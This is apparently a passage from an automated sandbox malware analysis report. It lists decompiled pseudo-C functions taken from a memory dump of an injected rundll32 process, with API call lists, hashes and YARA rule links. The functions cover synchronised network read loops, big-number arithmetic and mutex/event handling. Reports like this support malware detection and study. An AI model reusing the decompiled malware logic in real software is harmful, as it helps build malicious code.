												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x047b91ba
                                          0x047b91c3
                                          0x047b91c4
                                          0x047b91c8
                                          0x047b91ce
                                          0x047b91d4
                                          0x047b91dd
                                          0x047b91e3
                                          0x047b91ed
                                          0x047b91ef
                                          0x047b91f5
                                          0x047b91fa
                                          0x047b9205
                                          0x047b920b
                                          0x047b9210
                                          0x047b9332
                                          0x047b9216
                                          0x047b9216
                                          0x047b9223
                                          0x047b9229
                                          0x047b922f
                                          0x047b9233
                                          0x047b9239
                                          0x047b9246
                                          0x047b924a
                                          0x047b9250
                                          0x047b9253
                                          0x047b925b
                                          0x047b925c
                                          0x047b9260
                                          0x047b9264
                                          0x047b9267
                                          0x047b926a
                                          0x047b9270
                                          0x047b9279
                                          0x047b927f
                                          0x047b9280
                                          0x047b9283
                                          0x047b9284
                                          0x047b9285
                                          0x047b928d
                                          0x047b928e
                                          0x047b928f
                                          0x047b9291
                                          0x047b9295
                                          0x047b9299
                                          0x00000000
                                          0x00000000
                                          0x047b929f
                                          0x047b92a8
                                          0x047b92ae
                                          0x047b92b8
                                          0x047b92bc
                                          0x047b92be
                                          0x047b92cb
                                          0x047b92cf
                                          0x047b92d7
                                          0x047b92dc
                                          0x047b92ee
                                          0x047b92f0
                                          0x047b92f6
                                          0x047b92f6
                                          0x047b92ff
                                          0x047b92ff
                                          0x047b9301
                                          0x047b9307
                                          0x047b9307
                                          0x047b930a
                                          0x047b9310
                                          0x047b9313
                                          0x047b931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b931c
                                          0x047b9270
                                          0x047b926a
                                          0x047b9253
                                          0x047b9322
                                          0x047b9322
                                          0x047b9328
                                          0x047b9328
                                          0x047b932e
                                          0x047b932e
                                          0x047b9337
                                          0x047b933d
                                          0x047b933d
                                          0x047b91fa
                                          0x047b9346

                                          APIs
                                          • SysAllocString.OLEAUT32(047BC298), ref: 047B9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047B92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B92FF
                                          • SysFreeString.OLEAUT32(?), ref: 047B932E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 83f90accc71d866300d4171ffaffb82881cb715c959afc6854847abafcce291f
                                          • Instruction ID: 182025292be2f19b74fe458d4d02d748cfe5e255c8a97dddb6290347aa4beeaa
                                          • Opcode Fuzzy Hash: 83f90accc71d866300d4171ffaffb82881cb715c959afc6854847abafcce291f
                                          • Instruction Fuzzy Hash: 5A5131B5D00609DFCB01DFA8C988EDEB7B5EF89704B148594EA15EB360D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B7664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E047B7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E047B48F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E047B748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E047B7074(_t101,  &_v236, _a8, _t96 - _t81);
					E047B7074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E047B748A(_t101, 0x47bd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E047B748A(_a16, _a4);
						E047B2FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L047BB088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L047BB082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E047B6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E047B15CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E047B687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x47bd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x047b7667
                                          0x047b7673
                                          0x047b7679
                                          0x047b767e
                                          0x047b7682
                                          0x047b77df
                                          0x047b77e3
                                          0x047b77e3
                                          0x047b7688
                                          0x047b768c
                                          0x047b7690
                                          0x047b7693
                                          0x047b769e
                                          0x047b76a4
                                          0x047b76a9
                                          0x047b76ac
                                          0x047b76c6
                                          0x047b76d2
                                          0x047b76db
                                          0x047b76e5
                                          0x047b76ea
                                          0x047b76ec
                                          0x047b76ef
                                          0x047b779d
                                          0x047b77a3
                                          0x047b77b4
                                          0x047b77c7
                                          0x047b77d7
                                          0x00000000
                                          0x047b77dc
                                          0x047b76f8
                                          0x047b76ff
                                          0x047b7703
                                          0x047b7709
                                          0x047b770b
                                          0x047b770d
                                          0x047b770f
                                          0x047b7711
                                          0x047b771b
                                          0x047b7720
                                          0x047b7722
                                          0x047b7724
                                          0x047b7725
                                          0x047b7726
                                          0x047b7727
                                          0x047b772e
                                          0x047b7735
                                          0x047b7738
                                          0x047b7738
                                          0x047b7705
                                          0x047b7705
                                          0x047b7705
                                          0x047b7740
                                          0x047b7748
                                          0x047b7751
                                          0x047b7756
                                          0x047b7756
                                          0x047b775b
                                          0x00000000
                                          0x00000000
                                          0x047b775d
                                          0x047b7760
                                          0x047b776a
                                          0x00000000
                                          0x00000000
                                          0x047b776c
                                          0x047b776c
                                          0x047b7776
                                          0x047b7756
                                          0x047b775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b775b
                                          0x047b7780
                                          0x047b7783
                                          0x047b7786
                                          0x047b778d
                                          0x047b778d
                                          0x047b779a
                                          0x00000000
                                          0x047b779a
                                          0x047b7695
                                          0x047b7699
                                          0x047b769a
                                          0x047b769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 047B7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 047B7727
                                          • memset.NTDLL ref: 047B77C7
                                          • memset.NTDLL ref: 047B77D7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 8913039eae67d7ef9cd30a94f903049f3b6c0aa6c229d8d5a8670b36ccbc1804
                                          • Instruction ID: 16f8211db9a4bbc3529dc02d37dafda6e6443ffca43494bbb56d428a33266f7e
                                          • Opcode Fuzzy Hash: 8913039eae67d7ef9cd30a94f903049f3b6c0aa6c229d8d5a8670b36ccbc1804
                                          • Instruction Fuzzy Hash: A1419671600249ABDB14EFA8CC48FEE7779EF84314F108569F955AB380EB70B9558BD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BA96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 047BA97E
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • ResetEvent.KERNEL32(?), ref: 047BA9F2
                                          • GetLastError.KERNEL32 ref: 047BAA15
                                          • GetLastError.KERNEL32 ref: 047BAAC0
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: bca94519c941a9398d347864684aa461429b0014b3cbfc7e6562183d14127c3c
                                          • Instruction ID: 24de781b67a63db2ec4cd6d9874172a92859ebb88d273cc99da9372a4a27119e
                                          • Opcode Fuzzy Hash: bca94519c941a9398d347864684aa461429b0014b3cbfc7e6562183d14127c3c
                                          • Instruction Fuzzy Hash: 63418271500608BFE731AFA1CD48FDB7BBDEB88700F148929F582E1290E775A904DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B8F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E047B8F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x47bd138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x47bd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E047B58BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x47bd138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E047B147E(_v16);
							if(_t58 == 0) {
								_t58 = E047B16DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E047B9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E047B9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x047b8f17
                                          0x047b8f1c
                                          0x047b8f1e
                                          0x047b8f23
                                          0x047b8f24
                                          0x047b8f29
                                          0x047b8f2a
                                          0x047b8f35
                                          0x047b8f66
                                          0x047b8f6b
                                          0x047b902e
                                          0x047b9031
                                          0x047b9037
                                          0x047b9037
                                          0x047b8f78
                                          0x047b8f80
                                          0x047b902b
                                          0x00000000
                                          0x047b902b
                                          0x047b8f8b
                                          0x047b8f90
                                          0x047b8f95
                                          0x047b901d
                                          0x047b901e
                                          0x047b901e
                                          0x047b9024
                                          0x00000000
                                          0x047b9024
                                          0x047b8f9b
                                          0x047b8f9d
                                          0x047b8fa3
                                          0x047b8fa4
                                          0x047b8fa4
                                          0x047b8fa7
                                          0x047b8faa
                                          0x047b8fb0
                                          0x047b8fb5
                                          0x047b8fb6
                                          0x047b8fbb
                                          0x047b8fbe
                                          0x047b8fc9
                                          0x00000000
                                          0x00000000
                                          0x047b8fd1
                                          0x047b8fd9
                                          0x047b9002
                                          0x047b9005
                                          0x047b900c
                                          0x047b9017
                                          0x047b9017
                                          0x00000000
                                          0x047b900c
                                          0x047b8fe5
                                          0x047b8fe9
                                          0x00000000
                                          0x00000000
                                          0x047b8feb
                                          0x047b8ff0
                                          0x00000000
                                          0x00000000
                                          0x047b8ff2
                                          0x047b8ff2
                                          0x047b8ff7
                                          0x00000000
                                          0x00000000
                                          0x047b8ff9
                                          0x047b8ffa
                                          0x047b8ffd
                                          0x047b8ffd
                                          0x047b8fa4
                                          0x047b8f3d
                                          0x047b8f45
                                          0x047b8f5e
                                          0x047b8f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b8f60
                                          0x047b8f51
                                          0x047b8f55
                                          0x00000000
                                          0x00000000
                                          0x047b8f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 047B8F1E
                                          • GetLastError.KERNEL32 ref: 047B8F37
                                            • Part of subcall function 047B9D3A: WaitForMultipleObjects.KERNEL32(00000002,047BAA33,00000000,047BAA33,?,?,?,047BAA33,0000EA60), ref: 047B9D55
                                          • ResetEvent.KERNEL32(?), ref: 047B8FB0
                                          • GetLastError.KERNEL32 ref: 047B8FCB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 212f1f9175f80a36535b481266831d404f006dd6f14025bf31da375e82cf1aa1
                                          • Instruction ID: 9ebd8255aa14f5c8e77564fa765c43991f22416eea18384a379a8c5f4cf5c5db
                                          • Opcode Fuzzy Hash: 212f1f9175f80a36535b481266831d404f006dd6f14025bf31da375e82cf1aa1
                                          • Instruction Fuzzy Hash: 0F31D6B2600A05AFDB229FA5CC44FDE77B9EF88350F114918E3A197250EA70F9419790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B72F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E047B72F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x47bd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x47bd2a4; // 0x24fa5a8
				_t3 = _t8 + 0x47be836; // 0x61636f4c
				_t25 = 0;
				_t30 = E047B6AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x47bd2a8, 1, 0, _t30);
					E047B147E(_t30);
				}
				_t12 =  *0x47bd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047B56A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E047B1493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x47bd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E047B7827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x047b72f3
                                          0x047b72fa
                                          0x047b7304
                                          0x047b7308
                                          0x047b730e
                                          0x047b731d
                                          0x047b7324
                                          0x047b7328
                                          0x047b733a
                                          0x047b733c
                                          0x047b733c
                                          0x047b7341
                                          0x047b7348
                                          0x047b739f
                                          0x047b739f
                                          0x047b73a5
                                          0x047b73a7
                                          0x047b73a7
                                          0x047b73b1
                                          0x047b73b5
                                          0x047b73c7
                                          0x047b73c7
                                          0x047b73cb
                                          0x047b73d1
                                          0x047b73d1
                                          0x00000000
                                          0x047b7361
                                          0x047b7366
                                          0x047b736e
                                          0x047b7372
                                          0x047b7376
                                          0x047b7376
                                          0x047b7383
                                          0x047b7387
                                          0x047b738b
                                          0x047b73e0
                                          0x047b73e6
                                          0x047b73e6
                                          0x047b7399
                                          0x047b739d
                                          0x047b73d4
                                          0x047b73d6
                                          0x047b73d9
                                          0x047b73d9
                                          0x00000000
                                          0x047b73d6
                                          0x047b739d
                                          0x00000000
                                          0x047b7387

                                          APIs
                                            • Part of subcall function 047B6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,047B2098,74666F53,00000000,?,047BD00C,?,?), ref: 047B6B2D
                                            • Part of subcall function 047B6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 047B6B51
                                            • Part of subcall function 047B6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 047B6B59
                                          • CreateEventA.KERNEL32(047BD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B7333
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,047B555B,00000000,00000000,?,00000000,?,047B555B,?,?,?), ref: 047B7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,047B555B,?,?,?), ref: 047B73D9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: e51c06ecfd10900de20253f5aed7a7045ad593318bfa9b85b180b921db4c9b23
                                          • Instruction ID: 8c1de1394f363d13f315d8c32b487ecf5f584bef68a2fad81b6d47fe88ef1776
                                          • Opcode Fuzzy Hash: e51c06ecfd10900de20253f5aed7a7045ad593318bfa9b85b180b921db4c9b23
                                          • Instruction Fuzzy Hash: F721C1326007929BD7355EA89C84FEA73A9EBC4714B054635FDD2DB340DB65EC0186D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047BA1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E047BA1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x47bd140; // 0x47bad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E047B58BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E047B147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E047B9D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x047ba1f1
                                          0x047ba1f1
                                          0x047ba1fb
                                          0x047ba201
                                          0x047ba204
                                          0x047ba208
                                          0x047ba20e
                                          0x047ba213
                                          0x047ba22c
                                          0x047ba22f
                                          0x047ba233
                                          0x047ba237
                                          0x047ba238
                                          0x047ba23d
                                          0x047ba240
                                          0x047ba247
                                          0x047ba24e
                                          0x047ba2a1
                                          0x047ba2a7
                                          0x047ba2ad
                                          0x047ba2e8
                                          0x047ba2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047ba2ad
                                          0x047ba254
                                          0x00000000
                                          0x047ba25b
                                          0x047ba269
                                          0x047ba26c
                                          0x047ba26f
                                          0x047ba27b
                                          0x047ba27f
                                          0x047ba2e1
                                          0x047ba281
                                          0x047ba284
                                          0x047ba288
                                          0x047ba289
                                          0x047ba28a
                                          0x047ba28c
                                          0x047ba293
                                          0x047ba2d1
                                          0x047ba2dc
                                          0x047ba295
                                          0x047ba298
                                          0x047ba29c
                                          0x047ba29c
                                          0x047ba293
                                          0x00000000
                                          0x047ba27f
                                          0x047ba254
                                          0x047ba218
                                          0x047ba21e
                                          0x047ba221
                                          0x047ba226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047ba2b6
                                          0x047ba2be
                                          0x047ba2c3
                                          0x047ba2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 047BA208
                                          • SetEvent.KERNEL32(?), ref: 047BA218
                                          • GetLastError.KERNEL32 ref: 047BA2A1
                                            • Part of subcall function 047B9D3A: WaitForMultipleObjects.KERNEL32(00000002,047BAA33,00000000,047BAA33,?,?,?,047BAA33,0000EA60), ref: 047B9D55
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • GetLastError.KERNEL32(00000000), ref: 047BA2D6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 45ee2e6b8bc6fd77105fc6e3fe8c772a8e63f63c1031149e8b3ff8a07b8bc6e8
                                          • Instruction ID: 6025148ba3771f0556709176d967dc133f7bb554151ff8f69242974bdd41f7b3
                                          • Opcode Fuzzy Hash: 45ee2e6b8bc6fd77105fc6e3fe8c772a8e63f63c1031149e8b3ff8a07b8bc6e8
                                          • Instruction Fuzzy Hash: C9312975A00309EFDB21EFD5C984ADEB7B8EB48304F108969D581A2240D735AA459F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B54AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E047B54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E047B4F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E047B5749(_t23);
						}
					}
					return _t38;
				}
				if(E047B9138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x47bd2a8, 1, 0,  *0x47bd340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E047B9575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E047BA642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
